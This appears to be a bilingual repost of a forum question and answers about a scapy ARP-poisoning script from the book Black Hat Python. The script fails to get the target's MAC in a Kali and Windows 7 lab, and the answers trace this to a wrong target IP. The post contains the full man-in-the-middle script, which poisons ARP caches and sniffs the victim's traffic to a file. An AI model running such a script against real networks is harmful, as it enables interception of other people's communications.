[英]ARP Poisoning with scapy: Failure to get target MAC
In the fourth chapter of Justin Seitz Black Hat Python book, the section detailing ARP poisoning using scapy.在 Justin Seitz Black Hat Python 书的第四章中,详细介绍了使用 scapy 进行 ARP 中毒的部分。 I'm having issues obtaining the mac address of the target ip of the target machine.
我在获取目标机器的目标 ip 的 mac 地址时遇到问题。 I'm using a Kali VM as the attacking machine and a Win 7 VM as the target machine.
我使用 Kali VM 作为攻击机器,使用 Win 7 VM 作为目标机器。
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*} Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses, unanswered = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
conf.iface = interface
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
The attacking machine:攻击机:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
The output:输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
you use the IP of kali ( attacking machine ) as target_ip
( 10.0.2.15 ).你使用kali(攻击机)的IP作为
target_ip
(10.0.2.15)。 Win runs on the same computer, however in a virtual machine and normally a virtual machine has its own IPs ( https://www.quora.com/Do-virtual-machines-have-their-own-IP ) Win 在同一台计算机上运行,但是在虚拟机中,通常虚拟机有自己的 IP( https://www.quora.com/Do-virtual-machines-have-their-own-IP )
it is even not certain if Win on the VM is on the same network automatically.甚至不确定 VM 上的 Win 是否自动位于同一网络上。 to assign static IPs for the VM and kali in the same
/24
network ( ie 10.0.2.x/24 - replace the x ) see https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address在同一个
/24
网络(即 10.0.2.x/24 - 替换 x )中为 VM 和 kali 分配静态 IP,请参阅https://serverfault.com/questions/839443/giving-the-vm-an-自己的IP地址
coder is right : first check if network connectivity is established by pinging编码器是对的:首先检查是否通过 ping 建立了网络连接
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.